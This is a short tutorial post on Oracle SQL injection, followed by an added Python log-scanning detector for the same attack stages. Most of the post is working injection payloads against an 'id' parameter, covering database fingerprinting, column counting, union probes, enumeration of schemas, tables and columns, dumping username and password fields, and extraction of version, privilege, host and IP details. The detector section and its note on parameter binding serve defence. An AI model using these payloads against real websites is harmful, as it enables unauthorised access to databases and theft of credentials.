SQL Injection -- Oracle
2016-10-09 20:34
1. Determine whether the database is Oracle
id=88 and exists(select * from dual)
id=88 and exists(select * from user_tables)
Both of these are system tables; if the page returns normally, the database is Oracle.
2. Find the number of columns
order by 4  error
order by 3  normal; the maximum column count is 3
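3. Determine the column types
id=88 union select null,null,null from dual
Checks whether any of the three columns raises a type error; if the page returns normally, continue.
id=88 and 1=2 union select 'ss',null,null / null,'ss',null / null,null,'ss'
Try each of the three column lists in turn; a normal response shows which column is a character type and can be used to display query results.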
4. Get all database names (assuming the second column is the character-type one)
id=88 and 1=2 union select null,(select global_name from global_name),null from dual
id=88 and 1=2 union select null,(select sys.database_name from dual),null from dual
id=88 and 1=2 union select null,(select name from v$database),null from dual
The three queries above return the names of a few special databases.
id=88 and 1=2 union select null,(select owner from all_tables where rownum=1),null from dual
id=88 and 1=2 union select null,(select owner from all_tables where owner<>'<first database name>' and rownum=1),null from dual
id=88 and 1=2 union select null,(select owner from all_tables where owner<>'<first database name>' and owner<>'<second database name>' and rownum=1),null from dual
Each query excludes the databases already found.
5. Get all tables in the current database
id=88 and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual
id=88 and 1=2 union select null,(select table_name from user_tables where table_name<>'<first table name>' and rownum=1),null from dual
id=88 and 1=2 union select null,(select table_name from user_tables where table_name<>'<first table name>' and table_name<>'<second table name>' and rownum=1),null from dual
6. Get the column names of a table
id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='<table name>' and rownum=1),null from dual
id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='<table name>' and column_name<>'<first column name>' and rownum=1),null from dual
id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='<table name>' and column_name<>'<first column name>' and column_name<>'<second column name>' and rownum=1),null from dual
7. Get the column values
id=88 and 1=2 union select null,username,password from <table name>--
8. Other important information
null,(select banner from sys.v_$version where rownum=1)  database version
null,(select * from session_roles where rownum=1)  current user's privileges
null,(select name from v$database)  database name
null,(select table_name from user_tables where rownum=1)  all tables in the current database
null,(select member from v$logfile where rownum=1)  server operating system
null,(select utl_inaddr.get_host_address from dual)  IP the server listens on
null,(select instance_name from v$instance)  database SID
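
The same sequence seen from the defender's side, as an added example that is not part of the original post: a Python detector that tags web access-log requests with the stage of the walkthrough they match and reports clients that progress through several stages. The stage names, regexes, the /news.jsp path and the log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Stage names follow the walkthrough above; the regexes are this example's own.
RULES = [(name, re.compile(rx)) for name, rx in [
    ("fingerprint", r"\bexists\s*\(\s*select\s*\*\s*from\s+(dual|user_tables)\b"),
    ("column_count", r"\border\s+by\s+\d+\b"),
    ("union_probe", r"\bunion\s+(all\s+)?select\b.*\bfrom\s+dual\b"),
    ("dictionary_enum", r"\b(all_tables|user_tables|user_tab_columns)\b.*\brownum\s*=\s*1\b"),
    ("instance_info", r"v_?\$(version|database|instance|logfile)\b|\b(session_roles|global_name|utl_inaddr)\b|\bsys\.database_name\b"),
]]
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) \S*?\?(\S*) HTTP/')

def normalize(query):
    """URL-decode, lowercase, drop /* */ comments, collapse whitespace."""
    text = unquote_plus(query).lower()
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)

def classify(query):
    """Return the stage names whose pattern appears in the query string."""
    text = normalize(query)
    return [name for name, rx in RULES if rx.search(text)]

def suspicious_clients(log_lines, min_stages=3):
    """Map client -> sorted stages, for clients seen in at least min_stages stages."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            seen[m.group(1)].update(classify(m.group(2)))
    return {ip: sorted(s) for ip, s in seen.items() if len(s) >= min_stages}

# Constructed access-log lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Oct/2016:20:30:01 +0800] "GET /news.jsp?id=88+and+exists(select+*from+dual) HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/Oct/2016:20:30:09 +0800] "GET /news.jsp?id=88+order+by+4 HTTP/1.1" 500 310',
    '203.0.113.7 - - [09/Oct/2016:20:30:20 +0800] "GET /news.jsp?id=88+and+1=2+union+select+null,(select+owner+from+all_tables+where+rownum=1),null+from+dual HTTP/1.1" 200 5133',
    '203.0.113.7 - - [09/Oct/2016:20:30:31 +0800] "GET /news.jsp?id=88+and+1%3D2+union+select+null,(select+banner+from+sys.v_%24version+where+rownum%3D1),null+from+dual HTTP/1.1" 200 5190',
    '198.51.100.20 - - [09/Oct/2016:20:31:02 +0800] "GET /news.jsp?id=88 HTTP/1.1" 200 5120',
    '198.51.100.20 - - [09/Oct/2016:20:31:15 +0800] "GET /search.jsp?q=dual+monitor&sort=order+by+price HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE_LOG))
```

Matching on the query string only catches probes sent in the URL; the underlying fix remains binding id as a query parameter instead of concatenating it into the SQL text.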